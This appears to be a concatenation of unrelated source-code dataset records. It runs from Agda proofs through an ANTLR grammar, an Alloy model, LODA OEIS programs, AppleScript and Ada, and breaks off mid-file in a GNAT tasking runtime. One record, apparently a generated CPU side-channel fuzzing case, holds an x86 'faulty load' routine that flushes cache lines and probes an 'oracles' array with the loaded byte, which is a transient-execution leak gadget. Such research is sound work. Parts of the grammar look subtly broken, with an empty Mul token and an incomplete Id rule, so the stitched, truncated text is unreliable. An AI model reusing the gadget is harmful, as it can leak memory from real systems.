υ) (⟦ sub σ M ⟧Un υ) (⟦ M ⟧Un (⟦ σ ⟧Un⋆ υ)) (sub⟦ N ⟧Eq σ υ) (⟦ sub σ N ⟧Un υ) (⟦ N ⟧Un (⟦ σ ⟧Un⋆ υ)) -------------------------------------------------------------------------------- -- TODO: Rename this sublift⟦⟧Eq⁈ : ∀ {Γ Ξ A B w} → {ρ : w ⊩⋆ Γ} → (σ : Γ ⊢⋆ Ξ) (M : Ξ , A ⊢ B) (N : Γ ⊢ A) → Un⋆ ρ → Eq (⟦ sub (liftₛ {A} σ) M ⟧ (ρ , ⟦ N ⟧ ρ)) (⟦ sub (σ , N) M ⟧ ρ) sublift⟦⟧Eq⁈ {ρ = ρ} σ M N υ = sublift⟦ M ⟧Eq σ υ (⟦ N ⟧Un υ) ⦙ sub⟦ M ⟧Eq (σ , N) υ ⁻¹ -------------------------------------------------------------------------------- -- TODO: Generalise theorem 4 over models module _ where open 𝔐 canon mutual lemƛ : ∀ {Γ A B w} → {ρ : w ⊩⋆ Γ} {M M′ : Γ , A ⊢ B} → M ∼ M′ → Un⋆ ρ → Eq (⟦ ƛ M ⟧ ρ) (⟦ ƛ M′ ⟧ ρ) lemƛ p υ = eq⊃ (λ xs u → cong⟦ p ⟧Eq (cong⬗Un⋆ xs υ , u)) lem∙ : ∀ {Γ A B w} → {ρ : w ⊩⋆ Γ} {M M′ : Γ ⊢ A ⇒ B} {N N′ : Γ ⊢ A} → M ∼ M′ → N ∼ N′ → Un⋆ ρ → Eq (⟦ M ∙ N ⟧ ρ) (⟦ M′ ∙ N′ ⟧ ρ) lem∙ {M = M} {M′} {N} {N′} p q υ = cong⟦∙⟧Eq idᵣ (cong⟦ p ⟧Eq υ) (⟦ M ⟧Un υ) (⟦ M′ ⟧Un υ) (cong⟦ q ⟧Eq υ) (⟦ N ⟧Un υ) (⟦ N′ ⟧Un υ) lemred⇒ : ∀ {Γ Ξ A B w} → {ρ : w ⊩⋆ Γ} → (σ : Γ ⊢⋆ Ξ) (M : Ξ , A ⊢ B) (N : Γ ⊢ A) → Un⋆ ρ → Eq (⟦ sub σ (ƛ M) ∙ N ⟧ ρ) (⟦ sub (σ , N) M ⟧ ρ) lemred⇒ {ρ = ρ} σ M N υ = ⟦ sub (liftₛ σ) M ⟧Eq (lid⬗Eq⋆ υ , reflEq (⟦ N ⟧Un υ)) (cong⬗Un⋆ idᵣ υ , ⟦ N ⟧Un υ) (υ , ⟦ N ⟧Un υ) ⦙ sublift⟦⟧Eq⁈ σ M N υ lemexp⇒ : ∀ {Γ A B w} → {ρ : w ⊩⋆ Γ} → (M : Γ ⊢ A ⇒ B) → Un⋆ ρ → Eq (⟦ M ⟧ ρ) (⟦ ƛ (wk M ∙ 0) ⟧ ρ) lemexp⇒ {ρ = ρ} M υ = eq⊃ (λ η {a} u → acc⟦∙⟧idEq η (⟦ M ⟧Un υ) u ⁻¹ ⦙ cong⟦∙⟧Eq idᵣ (⟦ M ⟧⬗Eq η υ ⁻¹) (congaccUn η (⟦ M ⟧Un υ)) (⟦ M ⟧Un (cong⬗Un⋆ η υ)) (reflEq u) u u ⦙ cong⟦∙⟧Eq idᵣ (wk⟦ M ⟧Eq (cong⬗Un⋆ η υ) u ⁻¹) (⟦ M ⟧Un (cong⬗Un⋆ η υ)) (⟦ wk M ⟧Un (cong⬗Un⋆ η υ , u)) (reflEq u) u u) -- Theorem 4. cong⟦_⟧Eq : ∀ {Γ A w} → {M M′ : Γ ⊢ A} {ρ : w ⊩⋆ Γ} → M ∼ M′ → Un⋆ ρ → Eq (⟦ M ⟧ ρ) (⟦ M′ ⟧ ρ) cong⟦ refl∼ {M = M} ⟧Eq υ = reflEq (⟦ M ⟧Un υ) cong⟦ p ⁻¹∼ ⟧Eq υ = cong⟦ p ⟧Eq υ ⁻¹ cong⟦ p ⦙∼ q ⟧Eq υ = cong⟦ p ⟧Eq υ ⦙ cong⟦ q ⟧Eq υ cong⟦ ƛ∼ p ⟧Eq υ = lemƛ p υ cong⟦ p ∙∼ q ⟧Eq υ = lem∙ p q υ cong⟦ red⇒ σ M N ⟧Eq υ = lemred⇒ σ M N υ cong⟦ exp⇒ M ⟧Eq υ = lemexp⇒ M υ -------------------------------------------------------------------------------- -- Theorem 5. thm₅ : ∀ {Γ A} → (M M′ : Γ ⊢ A) → nf M ≡ nf M′ → M ∼ M′ thm₅ M M′ p = thm₂ M ⦙ ≡→∼ p ⦙ (thm₂ M′ ⁻¹) -------------------------------------------------------------------------------- -- proj⟨_⟩𝒰⋆ ⌊_⌋ᵤ : ∀ {Γ Γ′} → (η : Γ′ ∋⋆ Γ) → Un⋆ ⌊ η ⌋ᵥ ⌊ ∅ ⌋ᵤ = ∅ ⌊ η , i ⌋ᵤ = ⌊ η ⌋ᵤ , ⟪𝓋 i ⟫ᵤ -- refl𝒰⋆ idᵤ : ∀ {Γ} → Un⋆ (idᵥ {Γ}) idᵤ = ⌊ idᵣ ⌋ᵤ -- Theorem 6. thm₆ : ∀ {Γ A} → (M M′ : Γ ⊢ A) → M ∼ M′ → nf M ≡ nf M′ thm₆ M M′ p = cor₁ M M′ (cong⟦ p ⟧Eq idᵤ) --------------------------------------------------------------------------------
dev/smack/Smack.g4	bvellacott/smack-js-compiler	0	3293	//Copyright (c) 2015 <NAME> // //Permission is hereby granted, free of charge, to any person obtaining a copy of //this software and associated documentation files (the "Software"), to deal in //the Software without restriction, including without limitation the rights to //use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies //of the Software, and to permit persons to whom the Software is furnished to do //so, subject to the following conditions: // //The above copyright notice and this permission notice shall be included in all //copies or substantial portions of the Software. // //THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR //IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, //FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE //AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER //LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, //OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE //SOFTWARE. // This is the grammar used to generate the select lexer and parser using the // antlr4 tool grammar Smack; import Json; smkFile : funcDecl* ; packageDecl : 'pack' dottedId ';' ; varAssign : jsonPath '=' expression ; funcDecl : 'func' Id '(' Id? (',' Id)* ')' codeBlock ; funcInvoke : dottedId '(' resolvable? (',' resolvable)* ')' ; jsonPath : Id (keyRef)* ; dottedId : Id ('.' Id)* ; keyRef : '[' resolvable ']' ; retStatement : 'ret' expression ; ifStat : 'if' '(' expression ')' codeBlock elseIfStat* elseStat? ; elseIfStat : 'else' 'if' '(' expression ')' codeBlock ; elseStat : 'else' codeBlock ; loop : 'while' '(' expression ')' codeBlock ; expression : '(' expression ')' # parenExpr \| <assoc=right> expression Pow expression # powExpr \| expression Mul expression # mulExpr \| expression Div expression # divExpr \| expression Mod expression # modExpr \| expression (Plus \| Minus)+ expression # sumExpr \| Minus expression # signedExpr \| Not expression # notExpr \| expression Eq expression # eqExpr \| expression Neq expression # neqExpr \| expression Lt expression # ltExpr \| expression Le expression # leExpr \| expression Gt expression # gtExpr \| expression Ge expression # geExpr \| expression And expression # andExpr \| expression Or expression # orExpr \| resolvable # atomExpr ; resolvable : value \| jsonPath \| funcInvoke ; codeBlock : '{' sentence* '}' ; sentence : statement ';' \| loop \| ifStat // \| comment ; statement : varAssign \| funcInvoke \| retStatement ; Pow : '^' ; Mul : '' ; Div : '/' ; Mod : '%' ; Plus : '+' ; Minus : '-' ; Not : '!' ; Eq : '==' ; Neq : '!=' ; Lt : '<' ; Le : '<=' ; Gt : '>' ; Ge : '>=' ; And : '&&' ; Or : '\|\|' ; Id : [$a-zA-Z_]+[$a-zA-Z_0-9] ; // Whitespace and comments are ignored Comment : '//' ~('\n')* '\n' -> skip ; WS : [ \t\r\n]+ -> skip ;
alloy4fun_models/trashltl/models/13/KvuCtBNYAMscB3zuL.als	Kaixi26/org.alloytools.alloy	0	4146	open main pred idKvuCtBNYAMscB3zuL_prop14 { all f : File \| (f in Trash and f in Protected) implies f not in Protected' } pred __repair { idKvuCtBNYAMscB3zuL_prop14 } check __repair { idKvuCtBNYAMscB3zuL_prop14 <=> prop14o }
Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0_notsx.log_5_1652.asm	ljhsiun2/medusa	9	95967	<reponame>ljhsiun2/medusa<filename>Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0_notsx.log_5_1652.asm .global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r13 push %r9 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_WT_ht+0x1ee77, %rax nop nop nop nop add %r13, %r13 mov $0x6162636465666768, %r10 movq %r10, (%rax) nop nop dec %rax lea addresses_A_ht+0x40f1, %rsi nop nop nop nop xor %r12, %r12 movups (%rsi), %xmm2 vpextrq $1, %xmm2, %rbp nop nop nop nop cmp %rsi, %rsi lea addresses_WT_ht+0x3277, %rsi nop nop nop sub %r9, %r9 movups (%rsi), %xmm1 vpextrq $1, %xmm1, %rbp nop sub %r9, %r9 lea addresses_WT_ht+0xc38b, %rsi nop nop nop nop dec %r10 movb $0x61, (%rsi) nop nop nop cmp %r13, %r13 lea addresses_WC_ht+0xdf97, %rsi lea addresses_UC_ht+0x13917, %rdi nop dec %rbp mov $18, %rcx rep movsl nop nop nop nop inc %rcx lea addresses_UC_ht+0x10ed8, %rsi lea addresses_A_ht+0xb93, %rdi cmp $38379, %r12 mov $50, %rcx rep movsb nop nop nop nop and $49707, %r13 lea addresses_WC_ht+0x1cd77, %rsi lea addresses_A_ht+0x16c57, %rdi nop nop nop nop nop sub %rbp, %rbp mov $105, %rcx rep movsl nop nop add $48370, %r12 lea addresses_WT_ht+0x16b7, %rdi nop nop cmp %rsi, %rsi mov (%rdi), %cx nop nop nop nop and $8427, %r12 lea addresses_UC_ht+0xa73f, %rcx nop nop nop nop nop and %r12, %r12 movb $0x61, (%rcx) nop nop dec %rdi lea addresses_normal_ht+0x191df, %rsi and $34761, %r12 vmovups (%rsi), %ymm6 vextracti128 $1, %ymm6, %xmm6 vpextrq $1, %xmm6, %rbp nop nop nop inc %rdi lea addresses_normal_ht+0x1a8e7, %rsi lea addresses_A_ht+0xd07f, %rdi nop nop nop dec %r13 mov $42, %rcx rep movsw nop nop nop nop xor $35040, %r12 pop %rsi pop %rdi pop %rcx pop %rbp pop %rax pop %r9 pop %r13 pop %r12 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r8 push %rax push %rbx push %rcx push %rdi // Load mov $0x2696c0000000ce7, %r8 clflush (%r8) nop dec %rax mov (%r8), %r12 nop nop sub $21231, %r12 // Load lea addresses_WT+0xe977, %rax clflush (%rax) nop sub $59191, %rbx mov (%rax), %r8w nop nop nop nop add %rax, %rax // Faulty Load lea addresses_A+0x2077, %rax nop nop inc %r10 mov (%rax), %cx lea oracles, %r8 and $0xff, %rcx shlq $12, %rcx mov (%r8,%rcx,1), %rcx pop %rdi pop %rcx pop %rbx pop %rax pop %r8 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_A', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 0}, 'OP': 'LOAD'} {'src': {'type': 'addresses_NC', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 4}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 8}, 'OP': 'LOAD'} [Faulty Load] {'src': {'type': 'addresses_A', 'AVXalign': False, 'size': 2, 'NT': False, 'same': True, 'congruent': 0}, 'OP': 'LOAD'} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 8, 'NT': False, 'same': False, 'congruent': 9}} {'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 16, 'NT': False, 'same': False, 'congruent': 8}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 1, 'NT': False, 'same': False, 'congruent': 1}} {'src': {'type': 'addresses_WC_ht', 'congruent': 5, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_UC_ht', 'congruent': 4, 'same': False}} {'src': {'type': 'addresses_UC_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 0, 'same': False}} {'src': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 5, 'same': False}} {'src': {'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 2, 'NT': False, 'same': False, 'congruent': 5}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'AVXalign': True, 'size': 1, 'NT': False, 'same': False, 'congruent': 3}} {'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 32, 'NT': False, 'same': False, 'congruent': 1}, 'OP': 'LOAD'} {'src': {'type': 'addresses_normal_ht', 'congruent': 2, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_A_ht', 'congruent': 2, 'same': False}} {'00': 5} 00 00 00 00 00 */
oeis/315/A315689.asm	neoneye/loda-programs	11	168460	<reponame>neoneye/loda-programs ; A315689: Coordination sequence Gal.6.624.6 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. ; Submitted by <NAME> ; 1,6,12,17,22,28,33,38,44,49,54,60,66,72,78,83,88,94,99,104,110,115,120,126,132,138,144,149,154,160,165,170,176,181,186,192,198,204,210,215,220,226,231,236,242,247,252,258,264,270 mov $2,$0 seq $0,315395 ; Coordination sequence Gal.6.120.6 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. sub $0,5 add $3,$0 div $3,3 mov $0,$3 add $0,2 mov $4,$2 mul $4,4 add $0,$4
node_modules/appium/node_modules/appium-ios-driver/osa/Rotate.applescript	migueref/educational-app	145	4714	<reponame>migueref/educational-app<filename>node_modules/appium/node_modules/appium-ios-driver/osa/Rotate.applescript on run argv set image_file to item 1 of argv set rotate_value to item 2 of argv tell application "Image Events" try set rotate_file to open image_file rotate rotate_file to angle rotate_value save rotate_file close rotate_file end try end tell end run
Task/Abstract-type/Ada/abstract-type-3.ada	LaudateCorpus1/RosettaCodeData	1	10056	with Ada.Finalization; ... type Node is abstract new Ada.Finalization.Limited_Controlled and Queue with record Previous : not null access Node'Class := Node'Unchecked_Access; Next : not null access Node'Class := Node'Unchecked_Access; end record; overriding procedure Finalize (X : in out Node); -- Removes the node from its list if any overriding procedure Dequeue (Lounge : in out Node; Item : in out Element); overriding procedure Enqueue (Lounge : in out Node; Item : in out Element); procedure Process (X : in out Node) is abstract; -- To be implemented
oeis/290/A290112.asm	neoneye/loda-programs	11	240305	; A290112: Binary representation of the diagonal from the origin to the corner of the n-th stage of growth of the two-dimensional cellular automaton defined by "Rule 643", based on the 5-celled von Neumann neighborhood. ; Submitted by <NAME> ; 1,11,101,1011,10111,101111,1011111,10111111,101111111,1011111111,10111111111,101111111111,1011111111111,10111111111111,101111111111111,1011111111111111,10111111111111111,101111111111111111,1011111111111111111,10111111111111111111,101111111111111111111,1011111111111111111111,10111111111111111111111,101111111111111111111111,1011111111111111111111111,10111111111111111111111111,101111111111111111111111111,1011111111111111111111111111,10111111111111111111111111111,101111111111111111111111111111 lpb $0 mov $3,$0 cmp $3,0 add $0,$3 sub $0,1 mov $2,$0 mov $0,0 seq $2,267623 ; Binary representation of the middle column of the "Rule 187" elementary cellular automaton starting with a single ON (black) cell. lpe mov $0,$2 mul $0,10 add $0,1
agda/Categories/Product.agda	oisdk/combinatorics-paper	4	1098	{-# OPTIONS --cubical --safe #-} module Categories.Product where open import Prelude hiding (_×_) open import Categories module _ {ℓ₁ ℓ₂} (C : Category ℓ₁ ℓ₂) where open Category C module _ (X Y : Ob) where record Product : Type (ℓ₁ ℓ⊔ ℓ₂) where field obj : Ob proj₁ : C [ obj , X ] proj₂ : C [ obj , Y ] ump : (f : C [ Z , X ]) (g : C [ Z , Y ]) → ∃![ f×g ] ((C [ proj₁ ∘ f×g ] ≡ f) Prelude.× (C [ proj₂ ∘ f×g ] ≡ g)) _P[_×_] : ∀ {Z} → (π₁ : C [ Z , X ]) (π₂ : C [ Z , Y ]) → C [ Z , obj ] _P[_×_] π₁ π₂ = fst (ump π₁ π₂) record HasProducts : Type (ℓ₁ ℓ⊔ ℓ₂) where field product : (X Y : Ob) → Product X Y _×_ : Ob → Ob → Ob A × B = Product.obj (product A B) module _ {A A′ B B′ : Ob} where open Product using (_P[_×_]) open Product (product A B) hiding (_P[_×_]) _\|×\|_ : C [ A , A′ ] → C [ B , B′ ] → C [ Product.obj (product A B) , Product.obj (product A′ B′) ] f \|×\| g = product A′ B′ P[ C [ f ∘ proj₁ ] × C [ g ∘ proj₂ ] ]
tools-src/gnu/gcc/gcc/ada/s-tasuti.adb	enfoTek/tomato.linksys.e2000.nvram-mod	80	28896	------------------------------------------------------------------------------ -- -- -- GNU ADA RUN-TIME LIBRARY (GNARL) COMPONENTS -- -- -- -- S Y S T E M . T A S K I N G . U T I L I T I E S -- -- -- -- B o d y -- -- -- -- $Revision$ -- -- -- Copyright (C) 1991-2001, Florida State University -- -- -- -- GNARL is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 2, or (at your option) any later ver- -- -- sion. GNARL is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -- -- for more details. You should have received a copy of the GNU General -- -- Public License distributed with GNARL; see file COPYING. If not, write -- -- to the Free Software Foundation, 59 Temple Place - Suite 330, Boston, -- -- MA 02111-1307, USA. -- -- -- -- As a special exception, if other files instantiate generics from this -- -- unit, or you link this unit with other files to produce an executable, -- -- this unit does not by itself cause the resulting executable to be -- -- covered by the GNU General Public License. This exception does not -- -- however invalidate any other reasons why the executable file might be -- -- covered by the GNU Public License. -- -- -- -- GNARL was developed by the GNARL team at Florida State University. It is -- -- now maintained by Ada Core Technologies Inc. in cooperation with Florida -- -- State University (http://www.gnat.com). -- -- -- ------------------------------------------------------------------------------ -- This package provides RTS Internal Declarations. -- These declarations are not part of the GNARLI pragma Polling (Off); -- Turn off polling, we do not want ATC polling to take place during -- tasking operations. It causes infinite loops and other problems. with System.Tasking.Debug; -- used for Known_Tasks with System.Task_Primitives.Operations; -- used for Write_Lock -- Set_Priority -- Wakeup -- Unlock -- Sleep -- Abort_Task -- Lock/Unlock_All_Tasks_List with System.Tasking.Initialization; -- Used for Defer_Abort -- Undefer_Abort -- Locked_Abort_To_Level with System.Tasking.Queuing; -- used for Dequeue_Call -- Dequeue_Head with System.Tasking.Debug; -- used for Trace with Unchecked_Conversion; package body System.Tasking.Utilities is package STPO renames System.Task_Primitives.Operations; use System.Tasking.Debug; use System.Task_Primitives; use System.Task_Primitives.Operations; procedure Locked_Abort_To_Level (Self_Id : Task_ID; T : Task_ID; L : ATC_Level) renames Initialization.Locked_Abort_To_Level; procedure Defer_Abort (Self_Id : Task_ID) renames System.Tasking.Initialization.Defer_Abort; procedure Defer_Abort_Nestable (Self_Id : Task_ID) renames System.Tasking.Initialization.Defer_Abort_Nestable; procedure Undefer_Abort (Self_Id : Task_ID) renames System.Tasking.Initialization.Undefer_Abort; procedure Undefer_Abort_Nestable (Self_Id : Task_ID) renames System.Tasking.Initialization.Undefer_Abort_Nestable; procedure Wakeup_Entry_Caller (Self_Id : Task_ID; Entry_Call : Entry_Call_Link; New_State : Entry_Call_State) renames Initialization.Wakeup_Entry_Caller; ---------------- -- Abort_Task -- ---------------- -- Similar to Locked_Abort_To_Level (Self_ID, T, 0), but: -- (1) caller should be holding no locks -- (2) may be called for tasks that have not yet been activated -- (3) always aborts whole task procedure Abort_One_Task (Self_ID : Task_ID; T : Task_ID) is begin Write_Lock (T); if T.Common.State = Unactivated then T.Common.Activator := null; T.Common.State := Terminated; T.Callable := False; Cancel_Queued_Entry_Calls (T); elsif T.Common.State /= Terminated then Locked_Abort_To_Level (Self_ID, T, 0); end if; Unlock (T); end Abort_One_Task; ----------------- -- Abort_Tasks -- ----------------- -- Compiler interface only: Do not call from within the RTS, -- except in the implementation of Ada.Task_Identification. -- This must be called to implement the abort statement. -- Much of the actual work of the abort is done by the abortee, -- via the Abort_Handler signal handler, and propagation of the -- Abort_Signal special exception. procedure Abort_Tasks (Tasks : Task_List) is Self_Id : constant Task_ID := STPO.Self; C : Task_ID; P : Task_ID; begin -- ???? -- Since this is a "potentially blocking operation", we should -- add a separate check here that we are not inside a protected -- operation. Defer_Abort_Nestable (Self_Id); -- ????? -- Really should not be nested deferral here. -- Patch for code generation error that defers abort before -- evaluating parameters of an entry call (at least, timed entry -- calls), and so may propagate an exception that causes abort -- to remain undeferred indefinitely. See C97404B. When all -- such bugs are fixed, this patch can be removed. for J in Tasks'Range loop C := Tasks (J); Abort_One_Task (Self_Id, C); end loop; Lock_All_Tasks_List; C := All_Tasks_List; while C /= null loop if C.Pending_ATC_Level > 0 then P := C.Common.Parent; while P /= null loop if P.Pending_ATC_Level = 0 then Abort_One_Task (Self_Id, C); exit; end if; P := P.Common.Parent; end loop; end if; C := C.Common.All_Tasks_Link; end loop; Unlock_All_Tasks_List; Undefer_Abort_Nestable (Self_Id); end Abort_Tasks; ------------------------------- -- Cancel_Queued_Entry_Calls -- ------------------------------- -- Cancel any entry calls queued on target task. Call this only while -- holding T locked, and nothing more. This should only be called by T, -- unless T is a terminated previously unactivated task. procedure Cancel_Queued_Entry_Calls (T : Task_ID) is Next_Entry_Call : Entry_Call_Link; Entry_Call : Entry_Call_Link; Caller : Task_ID; Level : Integer; Self_Id : constant Task_ID := STPO.Self; begin pragma Assert (T = Self or else T.Common.State = Terminated); for J in 1 .. T.Entry_Num loop Queuing.Dequeue_Head (T.Entry_Queues (J), Entry_Call); while Entry_Call /= null loop -- Leave Entry_Call.Done = False, since this is cancelled Caller := Entry_Call.Self; Entry_Call.Exception_To_Raise := Tasking_Error'Identity; Queuing.Dequeue_Head (T.Entry_Queues (J), Next_Entry_Call); Level := Entry_Call.Level - 1; Unlock (T); Write_Lock (Entry_Call.Self); Wakeup_Entry_Caller (Self_Id, Entry_Call, Cancelled); Unlock (Entry_Call.Self); Write_Lock (T); Entry_Call.State := Done; Entry_Call := Next_Entry_Call; end loop; end loop; end Cancel_Queued_Entry_Calls; ------------------------ -- Exit_One_ATC_Level -- ------------------------ -- Call only with abort deferred and holding lock of Self_Id. -- This is a bit of common code for all entry calls. -- The effect is to exit one level of ATC nesting. -- If we have reached the desired ATC nesting level, reset the -- requested level to effective infinity, to allow further calls. -- In any case, reset Self_Id.Aborting, to allow re-raising of -- Abort_Signal. procedure Exit_One_ATC_Level (Self_ID : Task_ID) is begin Self_ID.ATC_Nesting_Level := Self_ID.ATC_Nesting_Level - 1; pragma Debug (Debug.Trace (Self_ID, "EOAL: exited to ATC level: " & ATC_Level'Image (Self_ID.ATC_Nesting_Level), 'A')); pragma Assert (Self_ID.ATC_Nesting_Level >= 1); if Self_ID.Pending_ATC_Level < ATC_Level_Infinity then if Self_ID.Pending_ATC_Level = Self_ID.ATC_Nesting_Level then Self_ID.Pending_ATC_Level := ATC_Level_Infinity; Self_ID.Aborting := False; else -- Force the next Undefer_Abort to re-raise Abort_Signal pragma Assert (Self_ID.Pending_ATC_Level < Self_ID.ATC_Nesting_Level); if Self_ID.Aborting then Self_ID.ATC_Hack := True; Self_ID.Pending_Action := True; end if; end if; end if; end Exit_One_ATC_Level; ---------------------- -- Make_Independent -- ---------------------- -- Move the current task to the outermost level (level 2) of the master -- hierarchy of the environment task. That is one level further out -- than normal tasks defined in library-level packages (level 3). The -- environment task will wait for level 3 tasks to terminate normally, -- then it will abort all the level 2 tasks. See Finalize_Global_Tasks -- procedure for more information. -- This is a dangerous operation, and should only be used on nested tasks -- or tasks that depend on any objects that might be finalized earlier than -- the termination of the environment task. It is for internal use by the -- GNARL, to prevent such internal server tasks from preventing a partition -- from terminating. -- Also note that the run time assumes that the parent of an independent -- task is the environment task. If this is not the case, Make_Independent -- will change the task's parent. This assumption is particularly -- important for master level completion and for the computation of -- Independent_Task_Count. -- See procedures Init_RTS and Finalize_Global_Tasks for related code. procedure Make_Independent is Self_Id : constant Task_ID := STPO.Self; Environment_Task : constant Task_ID := STPO.Environment_Task; Parent : constant Task_ID := Self_Id.Common.Parent; Parent_Needs_Updating : Boolean := False; begin if Self_Id.Known_Tasks_Index /= -1 then Known_Tasks (Self_Id.Known_Tasks_Index) := null; end if; Defer_Abort (Self_Id); Write_Lock (Environment_Task); Write_Lock (Self_Id); pragma Assert (Parent = Environment_Task or else Self_Id.Master_of_Task = Library_Task_Level); Self_Id.Master_of_Task := Independent_Task_Level; -- The run time assumes that the parent of an independent task is the -- environment task. if Parent /= Environment_Task then -- We can not lock three tasks at the same time, so defer the -- operations on the parent. Parent_Needs_Updating := True; Self_Id.Common.Parent := Environment_Task; end if; -- Update Independent_Task_Count that is needed for the GLADE -- termination rule. See also pending update in -- System.Tasking.Stages.Check_Independent Independent_Task_Count := Independent_Task_Count + 1; Unlock (Self_Id); -- Changing the parent after creation is not trivial. Do not forget -- to update the old parent counts, and the new parent (i.e. the -- Environment_Task) counts. if Parent_Needs_Updating then Write_Lock (Parent); Parent.Awake_Count := Parent.Awake_Count - 1; Parent.Alive_Count := Parent.Alive_Count - 1; Environment_Task.Awake_Count := Environment_Task.Awake_Count + 1; Environment_Task.Alive_Count := Environment_Task.Alive_Count + 1; Unlock (Parent); end if; Unlock (Environment_Task); Undefer_Abort (Self_Id); end Make_Independent; ------------------ -- Make_Passive -- ------------------ -- Update counts to indicate current task is either terminated -- or accepting on a terminate alternative. Call holding no locks. procedure Make_Passive (Self_ID : Task_ID; Task_Completed : Boolean) is C : Task_ID := Self_ID; P : Task_ID := C.Common.Parent; Master_Completion_Phase : Integer; begin if P /= null then Write_Lock (P); end if; Write_Lock (C); if Task_Completed then Self_ID.Common.State := Terminated; if Self_ID.Awake_Count = 0 then -- We are completing via a terminate alternative. -- Our parent should wait in Phase 2 of Complete_Master. Master_Completion_Phase := 2; pragma Assert (Task_Completed); pragma Assert (Self_ID.Terminate_Alternative); pragma Assert (Self_ID.Alive_Count = 1); else -- We are NOT on a terminate alternative. -- Our parent should wait in Phase 1 of Complete_Master. Master_Completion_Phase := 1; pragma Assert (Self_ID.Awake_Count = 1); end if; -- We are accepting with a terminate alternative. else if Self_ID.Open_Accepts = null then -- Somebody started a rendezvous while we had our lock open. -- Skip the terminate alternative. Unlock (C); if P /= null then Unlock (P); end if; return; end if; Self_ID.Terminate_Alternative := True; Master_Completion_Phase := 0; pragma Assert (Self_ID.Terminate_Alternative); pragma Assert (Self_ID.Awake_Count >= 1); end if; if Master_Completion_Phase = 2 then -- Since our Awake_Count is zero but our Alive_Count -- is nonzero, we have been accepting with a terminate -- alternative, and we now have been told to terminate -- by a completed master (in some ancestor task) that -- is waiting (with zero Awake_Count) in Phase 2 of -- Complete_Master. pragma Debug (Debug.Trace (Self_ID, "Make_Passive: Phase 2", 'M')); pragma Assert (P /= null); C.Alive_Count := C.Alive_Count - 1; if C.Alive_Count > 0 then Unlock (C); Unlock (P); return; end if; -- C's count just went to zero, indicating that -- all of C's dependents are terminated. -- C has a parent, P. loop -- C's count just went to zero, indicating that all of C's -- dependents are terminated. C has a parent, P. Notify P that -- C and its dependents have all terminated. P.Alive_Count := P.Alive_Count - 1; exit when P.Alive_Count > 0; Unlock (C); Unlock (P); C := P; P := C.Common.Parent; -- Environment task cannot have terminated yet pragma Assert (P /= null); Write_Lock (P); Write_Lock (C); end loop; pragma Assert (P.Awake_Count /= 0); if P.Common.State = Master_Phase_2_Sleep and then C.Master_of_Task = P.Master_Within then pragma Assert (P.Common.Wait_Count > 0); P.Common.Wait_Count := P.Common.Wait_Count - 1; if P.Common.Wait_Count = 0 then Wakeup (P, Master_Phase_2_Sleep); end if; end if; Unlock (C); Unlock (P); return; end if; -- We are terminating in Phase 1 or Complete_Master, -- or are accepting on a terminate alternative. C.Awake_Count := C.Awake_Count - 1; if Task_Completed then pragma Assert (Self_ID.Awake_Count = 0); C.Alive_Count := C.Alive_Count - 1; end if; if C.Awake_Count > 0 or else P = null then Unlock (C); if P /= null then Unlock (P); end if; return; end if; -- C's count just went to zero, indicating that all of C's -- dependents are terminated or accepting with terminate alt. -- C has a parent, P. loop -- Notify P that C has gone passive. P.Awake_Count := P.Awake_Count - 1; if Task_Completed and then C.Alive_Count = 0 then P.Alive_Count := P.Alive_Count - 1; end if; exit when P.Awake_Count > 0; Unlock (C); Unlock (P); C := P; P := C.Common.Parent; if P = null then return; end if; Write_Lock (P); Write_Lock (C); end loop; -- P has non-passive dependents. if P.Common.State = Master_Completion_Sleep and then C.Master_of_Task = P.Master_Within then pragma Debug (Debug.Trace (Self_ID, "Make_Passive: Phase 1, parent waiting", 'M')); -- If parent is in Master_Completion_Sleep, it -- cannot be on a terminate alternative, hence -- it cannot have Awake_Count of zero. pragma Assert (P.Common.Wait_Count > 0); P.Common.Wait_Count := 